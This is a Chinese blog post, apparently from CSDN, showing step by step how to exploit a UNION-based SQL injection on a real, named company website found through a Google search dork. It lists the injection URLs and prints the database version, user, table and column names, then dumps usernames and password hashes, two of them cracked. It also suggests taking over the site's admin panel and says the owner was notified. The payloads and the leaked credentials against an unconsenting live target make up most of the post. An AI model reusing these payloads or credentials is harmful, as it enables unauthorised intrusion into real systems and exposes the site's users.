SQL注入

最新推荐文章于 2024-11-11 08:41:40 发布
最新推荐文章于 2024-11-11 08:41:40 发布
阅读量1.8k 收藏 1
点赞数 1
分类专栏: 数据库 文章标签: sql注入 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laozhaokun/article/details/44590653
版权

通过成功地SQL注入,可能可以拿到目标数据库的全部信息!

首先要找到目标网址,以进行漏洞测试。

在google中搜索:inurl:news.php?id=2

任意点入一个网址:在网址后追加SQL语句,如果报错,则OK,可注入,如果未报错,无可注入漏洞或未找到。

 比如,找到一个网址:http://www.calidus.ro/en/news.php?id=2

将此链接变成如下,去访问

http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1--
http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1,2--
http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1,2,3--
http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1,2,3,4--
前三个会提示如下信息: 

Query failed: The used SELECT statements have a different number of columns

由于union的两个查询的列的数量需要一样,所以可知正常的查询就是4个列。
第四个返回正常的文章外,还返回了 

2

4

说明1,3虽然查询了,但是没有显示出来,那我们就利用2,4字段。 

http://www.calidus.ro/en/news.php?id=2%20UNION%20SELECT%201,version(),3,database()--
5.1.70-log
caliduzb_calidussql
以上,查出了数据库的版本和当前数据库名。

下面,查出数据库用户名。

http://www.calidus.ro/en/news.php?id=2%20UNION%20SELECT%201,version(),3,user()--
5.1.70-log
caliduzb_calidus@localhost

由于此版本已经不支持password()函数,暂时无法查到密码。

下面的sql查出当前数据库中所有的表.

http://www.calidus.ro/en/news.php?id=2 union select1,2,3,group_concat(table_name) from information_schema.tables  where table_schema=database()--

2
about,about_de,about_en,categories,categories_de,categories_en,
contact,contact_de,contact_en,customers,eco,eco_de,eco_en,
faq,faq_de,faq_en,forum_answer,forum_question,galleries,
gallery,gallery_de,gallery_en,gallery_images,imp,mission,mission_de,
mission_en,news,news_de,news_en,pellets,pellets_de,pellets_en,prices,
products,products_de,products_en,projects,projects_de,projects_en,
special_offers,special_offers_de,special_offers_en,support,support_de,
support_en,users,vizion,vizion_de,vizion_en

看到一个users表,先看看字段: 

http://www.calidus.ro/en/news.php?id=2 union select 1,2,3,group_concat(column_name) from information_schema.columns  where table_name='users'--
 user_id,user_type,user_regdate,username,user_password,user_email,user_lastvisit,user_last_confirm_key,user_new_privmsg,logcode,username_clean

有用户名、密码字段。

下面就查一下用户名、密码。

http://www.calidus.ro/en/news.php?id=2 union select 1,username,3,user_password from users--


dexmod

a0dbde9503e13437db0f854b0b72a73b

admin

63a9f0ea7bb98050796b649e85481845

miladro

122f961db675f6a45b998594471a990b

用户名是明文,密码hash过。上解密网站一查,分别是marjan,root,没解出来。

到这里,去找网站的管理界面就可以管理网站了。(已经给网站联系邮箱发邮件告知sql注入漏洞)

sanfendi
关注
专栏目录
SQL 注入漏洞详解
Toasten
07-23 2137
SQL 注入即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询从而进一步得到相应的数据信息。
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
SQL注入是一种严重的安全威胁,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码来执行未经授权的数据库操作。攻击者通常寻找没有适当验证和过滤的用户输入,然后利用这些漏洞来构造能改变原始SQL语句意图的...
Mysql 加号 Contact
随便记记
07-06 8074
Select CONCAT("A",1)     //输出A1 Select CONCAT("A",1) + 1   //输出1 Select CONCAT(1,"A") +1 //输出2 Select CONCAT(1,"A") + "A"          //输出1 Select CONCAT(1,"A","2") + "2"    //输出3 Select CONCAT(1,"2
sql注入详解
内心不种满鲜花就会长满杂草
05-05 22万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入
leekos的博客,分享web安全相关知识~
12-06 2224
sql提交注入
Go语言Gin框架安全加固:全面解析SQL注入、XSS与CSRF的解决方案
热门推荐
qq_35716689的博客
02-04 37万+
在使用 Gin 框架处理前端请求数据时,必须关注安全性问题,以防范常见的攻击。作者: 鼠鼠我捏,要死了捏
细说——SQL注入
LainWith的博客
10-09 7975
目录SQL是什么?什么是SQL注入漏洞原理漏洞原因为什么会有SQL注入注⼊点可能存在的位置漏洞危害提交方法判断注入点判断字符型还是数字型sql注入绕过获取网站路径SQL 注入读写文件1. 数据库支持文件读写2. 当前用户具有文件权限3. 知道文件绝对路径查询方式及报错盲注⭐查询方式报错盲注报错注入函数二次注入原理实施步骤举例堆叠查询DNSlog脑图常见数据库,及注入相关⭐注释符、数据库端口数据库文件后缀名特有的数据库查看当前用户或权限ASCII转换函数不同数据库注入结果的区别⭐Sql注入中连接字符串常用函数
SQL注入攻击与防护
weixin_62707591的博客
06-21 6722
攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,并且插入的恶意SQL命令会导致原有SQL语句作用发生改变,从而得到欺骗服务器执行恶意SQL命令的一种攻击方式。① 概述开源的自动化SQL注入工具,由Python写成② 主要功能扫描、发现、利用给定URL的SQL注入漏洞③ 特点。
Mybatis防止SQL注入
Jc0803kevin的专栏
07-13 1530
防止SQL注入的中心思想就是参数化查询,将输入当作参数传递,而不是直接拼接到 SQL 语句中。常见的防止SQL注入的方式1、#{}2、3、[配置 SQL 注入过滤器](#配置 SQL 注入过滤器)
SQL注入攻击
qq_67812668的博客
08-05 1730
1.SQL注入的原理SQL注入就是通过web表单吧SQL命令提交到web应用程序,由于程序没有细致的过滤用户输入的数据,造成字符串拼接,进而恶意的SQL语句被执行,造成数据库信息泄露,网页篡改,数据库被恶意操作等 2.SQL注入的危害数据库信息泄漏:数据库中存放的用户的隐私信息的泄露。网页篡改:通过操作数据库对特定网页进行篡改。网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员账户被窜改。
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
07 Oracle数据库恢复基础解析:从检查点到归档,一步步构建数据安全防线
超哥的博客
11-09 1249
检查点是Oracle数据库中的一个特殊事件,它的作用是将内存中的数据块同步到磁盘上,以确保数据的持久性。简单来说,就是让数据库“记住”到目前为止所有的更改。Redo日志是Oracle用来记录所有数据更改的日志文件。每次对数据库进行修改时,都会先写入Redo日志,然后再写入数据文件。这样,即使系统崩溃,也能通过Redo日志恢复数据。当数据库运行在归档模式下时,一旦当前的Redo日志文件满,Oracle会将其复制到一个安全的存储位置,并标记为已归档。这样可以长期保留Redo日志,便于历史数据的恢复。
2024.11.6-Redis的事务与持久化
whisper_Java 的博客
11-06 864
MULTI、EXEC、DISCARD和WATCH 是 Redis 事务相关的命令。Redis的事务是将一系列待执行的指令存到一个Queue中,并使用exec执行事务。​--1. Redis事务是一个独立的隔离机制:事务中的所有命令都会序列化到queue、并按顺序地执行queue里的指令。事务在执行的过程中,不会被其他客户端发送来的命令请求所打断。​​multi: 用于开启事务,将待执行的命令放入到队列中exec命令:负责触发并执行事务中的所有命令:discard: 用于取消组队。
Redis - 事务
ketil27的博客
11-08 903
Redis 的事务和MySQL的事务概念上是类似的.都是把⼀系列操作绑定成⼀组.让这⼀组能够批量执 ⾏.弱化的原⼦性:redis没有"回滚机制".只能做到这些操作"批量执⾏".不能做到"⼀个失败就恢复到 初始状态".不保证⼀致性:不涉及"约束". 也没有回滚.MySQL的⼀致性体现的是运⾏事务前和运⾏后,结果都 是合理有效的,不会出现中间⾮法状态.不需要隔离性:也没有隔离级别,因为不会并发执⾏事务(redis单线程处理请求).
随堂测微信小程序ssm+论文源码调试讲解
最新发布
u014445459的博客
11-11 771
微信小程序,简称小程序,英文名Mini Program,是一种全新的连接用户与服务的方式,可以快速访问、快速传播,并具有良好的使用体验。小程序的主要开发语言是JavaScript,它与普通web的开发有很多相似之处。小程序和普通网页开发并不是相同的东西,是有差异的。网页开发的渲染线程和脚本线程是互斥的,而在小程序中,确实分开的,分别在不同的线程之中运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值